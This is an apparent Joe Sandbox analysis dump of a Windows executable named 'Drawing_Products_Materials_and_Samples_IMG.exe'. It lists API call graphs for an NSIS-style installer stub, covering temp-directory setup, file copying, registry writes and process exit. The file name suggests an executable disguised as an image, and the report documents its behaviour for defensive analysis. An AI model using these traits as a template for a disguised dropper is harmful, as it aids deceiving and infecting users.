404eea 4850->4852 4853 404ecf lstrlenA 4850->4853 4851->4850 4855 404ef0 SetWindowTextA 4852->4855 4856 404efd 4852->4856 4854 404ee1 lstrcatA 4853->4854 4853->4858 4854->4852 4855->4856 4857 404f03 SendMessageA SendMessageA SendMessageA 4856->4857 4856->4858 4857->4858 4859 40220a 4860 402211 4859->4860 4862 402224 4859->4862 4861 405b9e 18 API calls 4860->4861 4863 40221e 4861->4863 4864 4053ad MessageBoxIndirectA 4863->4864 4864->4862 4865 40400a 4866 404041 4865->4866 4867 40400e 4865->4867 4868 40407c 4866->4868 4870 403e8c 19 API calls 4866->4870 4869 403e8c 19 API calls 4867->4869 4880 403ec1 SendMessageA 4868->4880 4869->4866 4872 40404e CheckDlgButton 4870->4872 4879 403eae KiUserCallbackDispatcher 4872->4879 4873 404082 SendMessageA 4875 4040a0 GetSysColor 4873->4875 4876 4040a9 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4873->4876 4875->4876 4878 404258 4876->4878 4877 40406c GetDlgItem 4877->4868 4879->4877 4880->4873 4881 40100b DefWindowProcA 4882 401179 4881->4882 4883 40260c 4884 402613 4883->4884 4886 40289c 4883->4886 4885 402619 FindClose 4884->4885 4885->4886 4887 401490 4888 404e89 25 API calls 4887->4888 4889 401497 4888->4889 4890 100015d0 4891 100014d8 4 API calls 4890->4891 4893 100015e8 4891->4893 4892 1000162e GlobalFree 4893->4892 4894 10001603 4893->4894 4895 1000161a VirtualFree 4893->4895 4894->4892 4895->4892 4896 402814 4897 4029ea 18 API calls 4896->4897 4898 40281a 4897->4898 4899 40284b 4898->4899 4900 40266d 4898->4900 4902 402828 4898->4902 4899->4900 4901 405b9e 18 API calls 4899->4901 4901->4900 4902->4900 4904 405ada wsprintfA 4902->4904 4904->4900 3706 401595 3707 402a07 18 API calls 3706->3707 3708 40159c SetFileAttributesA 3707->3708 3709 4015ae 3708->3709 4905 401c95 4906 4029ea 18 API calls 4905->4906 4907 401c9c 4906->4907 4908 4029ea 18 API calls 4907->4908 4909 401ca4 GetDlgItem 4908->4909 4910 4024c9 4909->4910 4911 100018d6 4912 100018df 4911->4912 4913 10001278 2 API calls 4912->4913 4914 10001a0c GlobalFree GlobalFree 4913->4914 3715 402517 3716 4029ea 18 API calls 3715->3716 3719 402521 3716->3719 3717 402597 3718 402555 ReadFile 3718->3717 3718->3719 3719->3717 3719->3718 3720 402599 3719->3720 3721 4025a9 3719->3721 3724 405ada wsprintfA 3720->3724 3721->3717 3723 4025bf SetFilePointer 3721->3723 3723->3717 3724->3717 4915 10001058 4916 1000123b 3 API calls 4915->4916 4918 10001074 4916->4918 4917 100010dc 4918->4917 4919 10001091 4918->4919 4920 100014d8 4 API calls 4918->4920 4921 100014d8 4 API calls 4919->4921 4920->4919 4922 100010a1 4921->4922 4923 100010b1 4922->4923 4924 100010a8 GlobalSize 4922->4924 4925 100010b5 GlobalAlloc 4923->4925 4926 100010c6 4923->4926 4924->4923 4927 100014ff 3 API calls 4925->4927 4928 100010d1 GlobalFree 4926->4928 4927->4926 4928->4917 3740 40231a 3741 402320 3740->3741 3742 402a07 18 API calls 3741->3742 3743 402332 3742->3743 3744 402a07 18 API calls 3743->3744 3745 40233c RegCreateKeyExA 3744->3745 3746 402366 3745->3746 3747 40266d 3745->3747 3748 40237e 3746->3748 3749 402a07 18 API calls 3746->3749 3750 40238a 3748->3750 3753 4029ea 18 API calls 3748->3753 3752 402377 lstrlenA 3749->3752 3751 4023a5 RegSetValueExA 3750->3751 3757 402e6c 3750->3757 3755 4023bb RegCloseKey 3751->3755 3752->3748 3753->3750 3755->3747 3759 402e84 3757->3759 3758 402eb1 3779 403072 ReadFile 3758->3779 3759->3758 3781 4030a4 SetFilePointer 3759->3781 3763 403001 3765 40304d 3763->3765 3770 403005 3763->3770 3764 402ece GetTickCount 3766 402fec 3764->3766 3776 402ef7 3764->3776 3767 403072 ReadFile 3765->3767 3766->3751 3767->3766 3768 403072 ReadFile 3768->3776 3769 403072 ReadFile 3769->3770 3770->3766 3770->3769 3771 403025 WriteFile 3770->3771 3771->3766 3772 40303a 3771->3772 3772->3766 3772->3770 3774 40304b 3772->3774 3773 402f4d GetTickCount 3773->3776 3774->3766 3775 402f76 MulDiv wsprintfA 3777 404e89 25 API calls 3775->3777 3776->3766 3776->3768 3776->3773 3776->3775 3778 402fb4 WriteFile 3776->3778 3777->3776 3778->3766 3778->3776 3780 402ebc 3779->3780 3780->3763 3780->3764 3780->3766 3781->3758 4929 401b9b 4930 405b9e 18 API calls 4929->4930 4931 401ba6 4930->4931 4932 401b1d 4933 401b1e 4932->4933 4934 402211 4933->4934 4945 405b7c lstrcpynA 4933->4945 4935 405b9e 18 API calls 4934->4935 4936 40221e 4935->4936 4938 4053ad MessageBoxIndirectA 4936->4938 4944 402224 4938->4944 4939 401b44 4946 405b7c lstrcpynA 4939->4946 4941 401b53 4941->4934 4942 4027c2 4941->4942 4947 405b7c lstrcpynA 4942->4947 4945->4939 4946->4941 4947->4944 4948 100010e0 4949 1000110e 4948->4949 4950 1000123b 3 API calls 4949->4950 4958 1000111e 4950->4958 4951 100011c4 GlobalFree 4952 100012bf 2 API calls 4952->4958 4953 100011c3 4953->4951 4954 1000123b 3 API calls 4954->4958 4955 10001278 2 API calls 4959 100011b1 GlobalFree 4955->4959 4956 10001155 GlobalAlloc 4956->4958 4957 100011ea GlobalFree 4957->4958 4958->4951 4958->4952 4958->4953 4958->4954 4958->4955 4958->4956 4958->4957 4958->4959 4960 100012e8 lstrcpyA 4958->4960 4959->4958 4960->4958 4961 4016a1 4962 402a07 18 API calls 4961->4962 4963 4016a7 GetFullPathNameA 4962->4963 4966 4016be 4963->4966 4970 4016df 4963->4970 4964 4016f3 GetShortPathNameA 4965 40289c 4964->4965 4967 405e80 2 API calls 4966->4967 4966->4970 4968 4016cf 4967->4968 4968->4970 4971 405b7c lstrcpynA 4968->4971 4970->4964 4970->4965 4971->4970 3787 401922 3790 405459 3787->3790 3827 405717 3790->3827 3793 405481 DeleteFileA 3822 401928 3793->3822 3794 405498 3795 4055c6 3794->3795 3841 405b7c lstrcpynA 3794->3841 3800 405e80 2 API calls 3795->3800 3795->3822 3797 4054be 3798 4054d1 3797->3798 3799 4054c4 lstrcatA 3797->3799 3842 405670 lstrlenA 3798->3842 3801 4054d7 3799->3801 3803 4055ea 3800->3803 3804 4054e5 lstrcatA 3801->3804 3805 4054f0 lstrlenA FindFirstFileA 3801->3805 3803->3822 3860 405629 lstrlenA CharPrevA 3803->3860 3804->3805 3805->3795 3825 405514 3805->3825 3807 405654 CharNextA 3807->3825 3809 405411 5 API calls 3810 405600 3809->3810 3811 405604 3810->3811 3812 40561a 3810->3812 3817 404e89 25 API calls 3811->3817 3811->3822 3813 404e89 25 API calls 3812->3813 3813->3822 3814 4055a5 FindNextFileA 3816 4055bd FindClose 3814->3816 3814->3825 3816->3795 3818 405611 3817->3818 3820 405a30 40 API calls 3818->3820 3820->3822 3821 405459 64 API calls 3821->3825 3823 404e89 25 API calls 3823->3814 3824 404e89 25 API calls 3824->3825 3825->3807 3825->3814 3825->3821 3825->3823 3825->3824 3846 405b7c lstrcpynA 3825->3846 3847 405411 3825->3847 3855 405a30 3825->3855 3863 405b7c lstrcpynA 3827->3863 3829 405728 3864 4056c2 CharNextA CharNextA 3829->3864 3832 405479 3832->3793 3832->3794 3833 405de7 5 API calls 3839 40573e 3833->3839 3834 405769 lstrlenA 3835 405774 3834->3835 3834->3839 3836 405629 3 API calls 3835->3836 3838 405779 GetFileAttributesA 3836->3838 3837 405e80 2 API calls 3837->3839 3838->3832 3839->3832 3839->3834 3839->3837 3840 405670 2 API calls 3839->3840 3840->3834 3841->3797 3843 40567d 3842->3843 3844 405682 CharPrevA 3843->3844 3845 40568e 3843->3845 3844->3843 3844->3845 3845->3801 3846->3825 3870 405805 GetFileAttributesA 3847->3870 3850 40543e 3850->3825 3851 405434 DeleteFileA 3853 40543a 3851->3853 3852 40542c RemoveDirectoryA 3852->3853 3853->3850 3854 40544a SetFileAttributesA 3853->3854 3854->3850 3873 405ea7 GetModuleHandleA 3855->3873 3859 405a58 3859->3825 3861 405643 lstrcatA 3860->3861 3862 4055f4 3860->3862 3861->3862 3862->3809 3863->3829 3865 4056dd 3864->3865 3869 4056ed 3864->3869 3867 4056e8 CharNextA 3865->3867 3865->3869 3866 40570d 3866->3832 3866->3833 3867->3866 3868 405654 CharNextA 3868->3869 3869->3866 3869->3868 3871 40541d 3870->3871 3872 405817 SetFileAttributesA 3870->3872 3871->3850 3871->3851 3871->3852 3872->3871 3874 405ec3 LoadLibraryA 3873->3874 3875 405ece GetProcAddress 3873->3875 3874->3875 3876 405a37 3874->3876 3875->3876 3876->3859 3877 4058a2 lstrcpyA 3876->3877 3878 4058f1 GetShortPathNameA 3877->3878 3879 4058cb 3877->3879 3881 405906 3878->3881 3882 405a2a 3878->3882 3901 40582a GetFileAttributesA CreateFileA 3879->3901 3881->3882 3884 40590e wsprintfA 3881->3884 3882->3859 3883 4058d5 CloseHandle GetShortPathNameA 3883->3882 3885 4058e9 3883->3885 3886 405b9e 18 API calls 3884->3886 3885->3878 3885->3882 3887 405936 3886->3887 3902 40582a GetFileAttributesA CreateFileA 3887->3902 3889 405943 3889->3882 3890 405952 GetFileSize GlobalAlloc 3889->3890 3891 405a23 CloseHandle 3890->3891 3892 405974 ReadFile 3890->3892 3891->3882 3892->3891 3893 40598c 3892->3893 3893->3891 3903 40578f lstrlenA 3893->3903 3896 4059a5 lstrcpyA 3899 4059c7 3896->3899 3897 4059b9 3898 40578f 4 API calls 3897->3898 3898->3899 3900 4059fe SetFilePointer WriteFile GlobalFree 3899->3900 3900->3891 3901->3883 3902->3889 3904 4057d0 lstrlenA 3903->3904 3905 4057d8 3904->3905 3906 4057a9 lstrcmpiA 3904->3906 3905->3896 3905->3897 3906->3905 3907 4057c7 CharNextA 3906->3907 3907->3904 4972 402626 4973 402641 4972->4973 4974 402629 4972->4974 4975 4027c7 4973->4975 4978 405b7c lstrcpynA 4973->4978 4976 402636 FindNextFileA 4974->4976 4976->4973 4978->4975 4979 401d29 GetDC GetDeviceCaps 4980 4029ea 18 API calls 4979->4980 4981 401d44 MulDiv ReleaseDC 4980->4981 4982 4029ea 18 API calls 4981->4982 4983 401d63 4982->4983 4984 405b9e 18 API calls 4983->4984 4985 401d9c CreateFontIndirectA 4984->4985 4986 4024c9 4985->4986 4103 40172c 4104 402a07 18 API calls 4103->4104 4105 401733 4104->4105 4109 405859 4105->4109 4107 40173a 4108 405859 2 API calls 4107->4108 4108->4107 4110 405864 GetTickCount GetTempFileNameA 4109->4110 4111 405891 4110->4111 4112 405895 4110->4112 4111->4110 4111->4112 4112->4107 4113 401dac 4114 4029ea 18 API calls 4113->4114 4115 401db2 4114->4115 4116 4029ea 18 API calls 4115->4116 4117 401dbb 4116->4117 4118 401dc2 ShowWindow 4117->4118 4119 401dcd EnableWindow 4117->4119 4120 40289c 4118->4120 4119->4120 4987 401eac 4988 402a07 18 API calls 4987->4988 4989 401eb3 4988->4989 4990 405e80 2 API calls 4989->4990 4991 401eb9 4990->4991 4992 401ecb 4991->4992 4994 405ada wsprintfA 4991->4994 4994->4992 4995 40192d 4996 402a07 18 API calls 4995->4996 4997 401934 lstrlenA 4996->4997 4998 4024c9 4997->4998 4999 401cb0 5000 4029ea 18 API calls 4999->5000 5001 401cc0 SetWindowLongA 5000->5001 5002 40289c 5001->5002 5003 4024b0 5004 4024ba 5003->5004 5006 40249a 5003->5006 5007 40582a GetFileAttributesA CreateFileA 5004->5007 5007->5006 5008 401a31 5009 4029ea 18 API calls 5008->5009 5010 401a37 5009->5010 5011 4029ea 18 API calls 5010->5011 5012 4019e1 5011->5012 4350 401e32 4351 402a07 18 API calls 4350->4351 4352 401e38 4351->4352 4353 404e89 25 API calls 4352->4353 4354 401e42 4353->4354 4355 40534c 2 API calls 4354->4355 4357 401e48 4355->4357 4356 40266d 4357->4356 4358 401e9e CloseHandle 4357->4358 4359 401e67 WaitForSingleObject 4357->4359 4361 405ee0 2 API calls 4357->4361 4358->4356 4359->4357 4360 401e75 GetExitCodeProcess 4359->4360 4362 401e92 4360->4362 4363 401e87 4360->4363 4361->4359 4362->4358 4364 401e90 4362->4364 4366 405ada wsprintfA 4363->4366 4364->4358 4366->4364 4367 4015b3 4368 402a07 18 API calls 4367->4368 4369 4015ba 4368->4369 4370 4056c2 4 API calls 4369->4370 4381 4015c2 4370->4381 4371 40160a 4373 401638 4371->4373 4374 40160f 4371->4374 4372 405654 CharNextA 4375 4015d0 CreateDirectoryA 4372->4375 4379 401423 25 API calls 4373->4379 4376 401423 25 API calls 4374->4376 4377 4015e5 GetLastError 4375->4377 4375->4381 4378 401616 4376->4378 4380 4015f2 GetFileAttributesA 4377->4380 4377->4381 4385 405b7c lstrcpynA 4378->4385 4384 401630 4379->4384 4380->4381 4381->4371 4381->4372 4383 401621 SetCurrentDirectoryA 4383->4384 4385->4383 5013 4042b4 SetDlgItemTextA 5014 403ef3 8 API calls 5013->5014 5015 4042c5 5014->5015 4386 402036 4387 402a07 18 API calls 4386->4387 4388 40203d 4387->4388 4389 402a07 18 API calls 4388->4389 4390 402047 4389->4390 4391 402a07 18 API calls 4390->4391 4392 402050 4391->4392 4393 402a07 18 API calls 4392->4393 4394 40205a 4393->4394 4395 402a07 18 API calls 4394->4395 4396 402064 4395->4396 4397 402078 CoCreateInstance 4396->4397 4398 402a07 18 API calls 4396->4398 4401 402097 4397->4401 4402 40214d 4397->4402 4398->4397 4399 401423 25 API calls 4400 40217f 4399->4400 4401->4402 4403 40212c MultiByteToWideChar 4401->4403 4402->4399 4402->4400 4403->4402 5016 10002977 5017 1000298f 5016->5017 5018 10001551 2 API calls 5017->5018 5019 100029aa 5018->5019 5020 4014b7 5021 4014bd 5020->5021 5022 401389 2 API calls 5021->5022 5023 4014c5 5022->5023 5024 4027b7 5025 4027cc 5024->5025 5026 4027bd 5024->5026 5031 405ada wsprintfA 5025->5031 5030 405b7c lstrcpynA 5026->5030 5029 4027c7 5030->5029 5031->5029 4404 402438 4405 402b11 19 API calls 4404->4405 4406 402442 4405->4406 4407 4029ea 18 API calls 4406->4407 4408 40244b 4407->4408 4409 402455 4408->4409 4413 40266d 4408->4413 4410 402462 RegEnumKeyA 4409->4410 4411 40246e RegEnumValueA 4409->4411 4412 402487 RegCloseKey 4410->4412 4411->4412 4411->4413 4412->4413 4415 401bb8 4416 4029ea 18 API calls 4415->4416 4417 401bbf 4416->4417 4418 4029ea 18 API calls 4417->4418 4419 401bc9 4418->4419 4420 401bd9 4419->4420 4421 402a07 18 API calls 4419->4421 4422 401be9 4420->4422 4423 402a07 18 API calls 4420->4423 4421->4420 4424 401bf4 4422->4424 4425 401c38 4422->4425 4423->4422 4427 4029ea 18 API calls 4424->4427 4426 402a07 18 API calls 4425->4426 4429 401c3d 4426->4429 4428 401bf9 4427->4428 4430 4029ea 18 API calls 4428->4430 4431 402a07 18 API calls 4429->4431 4432 401c02 4430->4432 4433 401c46 FindWindowExA 4431->4433 4434 401c28 SendMessageA 4432->4434 4435 401c0a SendMessageTimeoutA 4432->4435 4436 401c64 4433->4436 4434->4436 4435->4436 4437 402239 4438 402241 4437->4438 4439 402247 4437->4439 4440 402a07 18 API calls 4438->4440 4441 402a07 18 API calls 4439->4441 4444 402257 4439->4444 4440->4439 4441->4444 4442 402a07 18 API calls 4445 402265 4442->4445 4443 402a07 18 API calls 4446 40226e WritePrivateProfileStringA 4443->4446 4444->4442 4444->4445 4445->4443 4447 4039b9 4448 4039d1 4447->4448 4449 403b0c 4447->4449 4448->4449 4450 4039dd 4448->4450 4451 403b5d 4449->4451 4452 403b1d GetDlgItem GetDlgItem 4449->4452 4453 4039e8 SetWindowPos 4450->4453 4454 4039fb 4450->4454 4456 403bb7 4451->4456 4464 401389 2 API calls 4451->4464 4455 403e8c 19 API calls 4452->4455 4453->4454 4457 403a00 ShowWindow 4454->4457 4458 403a18 4454->4458 4459 403b47 SetClassLongA 4455->4459 4460 403ed8 SendMessageA 4456->4460 4477 403b07 4456->4477 4457->4458 4461 403a20 DestroyWindow 4458->4461 4462 403a3a 4458->4462 4463 40140b 2 API calls 4459->4463 4474 403bc9 4460->4474 4516 403e15 4461->4516 4465 403a50 4462->4465 4466 403a3f SetWindowLongA 4462->4466 4463->4451 4467 403b8f 4464->4467 4470 403af9 4465->4470 4471 403a5c GetDlgItem 4465->4471 4466->4477 4467->4456 4472 403b93 SendMessageA 4467->4472 4468 40140b 2 API calls 4468->4474 4469 403e17 DestroyWindow EndDialog 4469->4516 4476 403ef3 8 API calls 4470->4476 4475 403a6f SendMessageA IsWindowEnabled 4471->4475 4479 403a8c 4471->4479 4472->4477 4473 403e46 ShowWindow 4473->4477 4474->4468 4474->4469 4474->4477 4478 405b9e 18 API calls 4474->4478 4484 403e8c 19 API calls 4474->4484 4492 403e8c 19 API calls 4474->4492 4507 403d57 DestroyWindow 4474->4507 4475->4477 4475->4479 4476->4477 4478->4474 4480 403a99 4479->4480 4481 403ae0 SendMessageA 4479->4481 4482 403aac 4479->4482 4490 403a91 4479->4490 4480->4481 4480->4490 4481->4470 4485 403ab4 4482->4485 4486 403ac9 4482->4486 4483 403e65 SendMessageA 4487 403ac7 4483->4487 4484->4474 4488 40140b 2 API calls 4485->4488 4489 40140b 2 API calls 4486->4489 4487->4470 4488->4490 4491 403ad0 4489->4491 4490->4483 4491->4470 4491->4490 4493 403c44 GetDlgItem 4492->4493 4494 403c61 ShowWindow KiUserCallbackDispatcher 4493->4494 4495 403c59 4493->4495 4517 403eae KiUserCallbackDispatcher 4494->4517 4495->4494 4497 403c8b EnableWindow 4500 403c9f 4497->4500 4498 403ca4 GetSystemMenu EnableMenuItem SendMessageA 4499 403cd4 SendMessageA 4498->4499 4498->4500 4499->4500 4500->4498 4518 403ec1 SendMessageA 4500->4518 4519 405b7c lstrcpynA 4500->4519 4503 403d02 lstrlenA 4504 405b9e 18 API calls 4503->4504 4505 403d13 SetWindowTextA 4504->4505 4506 401389 2 API calls 4505->4506 4506->4474 4508 403d71 CreateDialogParamA 4507->4508 4507->4516 4509 403da4 4508->4509 4508->4516 4510 403e8c 19 API calls 4509->4510 4511 403daf GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4510->4511 4512 401389 2 API calls 4511->4512 4513 403df5 4512->4513 4513->4477 4514 403dfd ShowWindow 4513->4514 4515 403ed8 SendMessageA 4514->4515 4515->4516 4516->4473 4516->4477 4517->4497 4518->4500 4519->4503 4520 4022be 4521 4022c3 4520->4521 4522 4022ee 4520->4522 4524 402b11 19 API calls 4521->4524 4523 402a07 18 API calls 4522->4523 4525 4022f5 4523->4525 4526 4022ca 4524->4526 4533 402a47 RegOpenKeyExA 4525->4533 4527 4022d4 4526->4527 4532 40230d 4526->4532 4528 402a07 18 API calls 4527->4528 4529 4022db RegDeleteValueA RegCloseKey 4528->4529 4529->4532 4539 40230b 4533->4539 4541 402a72 4533->4541 4534 402a98 RegEnumKeyA 4535 402aaa RegCloseKey 4534->4535 4534->4541 4536 405ea7 3 API calls 4535->4536 4538 402aba 4536->4538 4537 402acf RegCloseKey 4537->4539 4538->4539 4542 402aea RegDeleteKeyA 4538->4542 4539->4532 4540 402a47 3 API calls 4540->4541 4541->4534 4541->4535 4541->4537 4541->4540 4542->4539 4543 40173f 4544 402a07 18 API calls 4543->4544 4545 401746 4544->4545 4546 401764 4545->4546 4547 40176c 4545->4547 4582 405b7c lstrcpynA 4546->4582 4583 405b7c lstrcpynA 4547->4583 4550 401777 4552 405629 3 API calls 4550->4552 4551 40176a 4554 405de7 5 API calls 4551->4554 4553 40177d lstrcatA 4552->4553 4553->4551 4575 401789 4554->4575 4555 405e80 2 API calls 4555->4575 4557 405805 2 API calls 4557->4575 4558 4017a0 CompareFileTime 4558->4575 4559 401864 4560 404e89 25 API calls 4559->4560 4563 40186e 4560->4563 4561 404e89 25 API calls 4570 401850 4561->4570 4562 405b7c lstrcpynA 4562->4575 4564 402e6c 33 API calls 4563->4564 4565 401881 4564->4565 4566 401895 SetFileTime 4565->4566 4568 4018a7 CloseHandle 4565->4568 4566->4568 4567 405b9e 18 API calls 4567->4575 4569 4018b8 4568->4569 4568->4570 4571 4018d0 4569->4571 4572 4018bd 4569->4572 4574 405b9e 18 API calls 4571->4574 4573 405b9e 18 API calls 4572->4573 4576 4018c5 lstrcatA 4573->4576 4577 4018d8 4574->4577 4575->4555 4575->4557 4575->4558 4575->4559 4575->4562 4575->4567 4578 4053ad MessageBoxIndirectA 4575->4578 4580 40183b 4575->4580 4581 40582a GetFileAttributesA CreateFileA 4575->4581 4576->4577 4579 4053ad MessageBoxIndirectA 4577->4579 4578->4575 4579->4570 4580->4561 4580->4570 4581->4575 4582->4551 4583->4550 5032 40163f 5033 402a07 18 API calls 5032->5033 5034 401645 5033->5034 5035 405e80 2 API calls 5034->5035 5036 40164b 5035->5036 5037 40193f 5038 4029ea 18 API calls 5037->5038 5039 401946 5038->5039 5040 4029ea 18 API calls 5039->5040 5041 401950 5040->5041 5042 402a07 18 API calls 5041->5042 5043 401959 5042->5043 5044 40196c lstrlenA 5043->5044 5045 4019a7 5043->5045 5046 401976 5044->5046 5046->5045 5050 405b7c lstrcpynA 5046->5050 5048 401990 5048->5045 5049 40199d lstrlenA 5048->5049 5049->5045 5050->5048

                                                                                      Executed Functions

                                                                                      Function 004030EF Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 324stringfilecomCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 4030ef-403186 #17 SetErrorMode OleInitialize call 405ea7 SHGetFileInfoA call 405b7c GetCommandLineA call 405b7c GetModuleHandleA 7 403192-4031a7 call 405654 CharNextA 0->7 8 403188-40318d 0->8 11 40326c-403270 7->11 8->7 12 403276 11->12 13 4031ac-4031af 11->13 16 403289-4032a3 GetTempPathA call 4030bb 12->16 14 4031b1-4031b5 13->14 15 4031b7-4031bf 13->15 14->14 14->15 17 4031c1-4031c2 15->17 18 4031c7-4031ca 15->18 23 4032a5-4032c3 GetWindowsDirectoryA lstrcatA call 4030bb 16->23 24 4032fb-403315 DeleteFileA call 402c33 16->24 17->18 20 4031d0-4031d4 18->20 21 40325c-403269 call 405654 18->21 26 4031d6-4031dc 20->26 27 4031ec-403219 20->27 21->11 40 40326b 21->40 23->24 41 4032c5-4032f5 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 23->41 42 4033a9-4033b8 call 40354d OleUninitialize 24->42 43 40331b-403321 24->43 33 4031e2 26->33 34 4031de-4031e0 26->34 29 40321b-403221 27->29 30 40322c-40325a 27->30 36 403223-403225 29->36 37 403227 29->37 30->21 38 403278-403284 call 405b7c 30->38 33->27 34->27 34->33 36->30 36->37 37->30 38->16 40->11 41->24 41->42 55 4034b2-4034b8 42->55 56 4033be-4033ce call 4053ad ExitProcess 42->56 46 403323-40332e call 405654 43->46 47 403399-4033a0 call 403627 43->47 60 403330-403359 46->60 61 403364-40336e 46->61 53 4033a5 47->53 53->42 58 403535-40353d 55->58 59 4034ba-4034d7 call 405ea7 * 3 55->59 66 403543-403547 ExitProcess 58->66 67 40353f 58->67 87 403521-40352c ExitWindowsEx 59->87 88 4034d9-4034db 59->88 68 40335b-40335d 60->68 63 403370-40337d call 405717 61->63 64 4033d4-4033ee lstrcatA lstrcmpiA 61->64 63->42 77 40337f-403395 call 405b7c * 2 63->77 64->42 70 4033f0-403405 CreateDirectoryA SetCurrentDirectoryA 64->70 67->66 68->61 72 40335f-403362 68->72 74 403412-40343a call 405b7c 70->74 75 403407-40340d call 405b7c 70->75 72->61 72->68 86 403440-40345c call 405b9e DeleteFileA 74->86 75->74 77->47 97 40349d-4034a4 86->97 98 40345e-40346e CopyFileA 86->98 87->58 93 40352e-403530 call 40140b 87->93 88->87 91 4034dd-4034df 88->91 91->87 95 4034e1-4034f3 GetCurrentProcess 91->95 93->58 95->87 104 4034f5-403517 95->104 97->86 99 4034a6-4034ad call 405a30 97->99 98->97 100 403470-403490 call 405a30 call 405b9e call 40534c 98->100 99->42 100->97 112 403492-403499 CloseHandle 100->112 104->87 112->97
                                                                                      APIs
                                                                                      • #17.COMCTL32 ref: 00403110
                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 0040311B
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403122
                                                                                        • Part of subcall function 00405EA7: GetModuleHandleA.KERNEL32(?,?,?,00403134,?), ref: 00405EB9
                                                                                        • Part of subcall function 00405EA7: LoadLibraryA.KERNELBASE(?,?,?,00403134,?), ref: 00405EC4
                                                                                        • Part of subcall function 00405EA7: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                                                      • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,?), ref: 0040314A
                                                                                        • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                                                      • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000000), ref: 00403172
                                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000020), ref: 0040319D
                                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040329A
                                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032AB
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032B7
                                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CB
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032D3
                                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032E4
                                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032EC
                                                                                      • DeleteFileA.KERNELBASE(1033), ref: 00403300
                                                                                      • OleUninitialize.OLE32(?), ref: 004033AE
                                                                                      • ExitProcess.KERNEL32 ref: 004033CE
                                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000000,?), ref: 004033DA
                                                                                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033E6
                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033F2
                                                                                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033F9
                                                                                      • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?), ref: 00403452
                                                                                      • CopyFileA.KERNEL32(C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,0079D8B8,00000001), ref: 00403466
                                                                                      • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,00000000), ref: 00403493
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00000005,?,00000003), ref: 004034E8
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403524
                                                                                      • ExitProcess.KERNEL32 ref: 00403547
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
